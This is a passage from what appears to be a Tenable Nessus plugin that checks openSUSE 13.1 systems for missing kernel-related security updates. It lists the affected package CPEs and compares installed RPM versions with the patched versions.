value:\"p-cpe:/a:novell:opensuse:crash-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:crash-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:hdjmod-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ipset-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libipset3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libipset3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:pcfclock-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:vhba-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-xend-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-xend-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-2.639-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-debuginfo-2.639-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-debugsource-2.639-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-default-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-default-debuginfo-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-desktop-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-desktop-debuginfo-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-pae-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-pae-debuginfo-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-xen-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cloop-kmp-xen-debuginfo-2.639_k3.11.10_25-11.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-debuginfo-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-debugsource-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-devel-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-eppic-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-eppic-debuginfo-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-gcore-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-gcore-debuginfo-7.0.2-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-default-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-default-debuginfo-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-desktop-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-desktop-debuginfo-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-pae-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-pae-debuginfo-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-xen-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"crash-kmp-xen-debuginfo-7.0.2_k3.11.10_25-2.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-debugsource-1.28-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-default-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-default-debuginfo-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-desktop-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-desktop-debuginfo-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-pae-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-pae-debuginfo-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-xen-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"hdjmod-kmp-xen-debuginfo-1.28_k3.11.10_25-16.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-debuginfo-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-debugsource-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-devel-6.21.1-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-default-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-default-debuginfo-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-desktop-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-desktop-debuginfo-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-pae-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-pae-debuginfo-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-xen-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ipset-kmp-xen-debuginfo-6.21.1_k3.11.10_25-2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-1.4.20.3-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-debuginfo-1.4.20.3-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-debugsource-1.4.20.3-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-default-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-default-debuginfo-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-desktop-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-desktop-debuginfo-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-pae-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-pae-debuginfo-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"iscsitarget-kmp-xen-1.4.20.3_k3.11.10_25-13.16.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", 